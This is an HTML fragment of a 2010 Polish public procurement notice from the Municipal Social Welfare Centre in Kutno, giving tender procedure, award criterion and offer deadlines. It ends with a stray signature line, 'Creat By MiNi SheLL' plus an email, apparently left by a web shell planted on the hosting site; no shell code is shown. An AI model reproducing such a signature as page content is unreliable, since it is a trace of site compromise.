<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.kutno.bip-jst.pl/index.php?grupa=38767<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Kutnie 
Adres:
 99 - 300 Kutno, ul. Warszawskie Przedmieście 10a pok. Nr 4.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.05.2010 godzina 12:00, miejsce: Miejski Ośrodek Pomocy Społecznej w Kutnie, ul.Warszawskie    
          Przedmieście 10a, 99-300 Kutno, pokój. Nr 32 Sekretariat..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 16.06.2010.</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com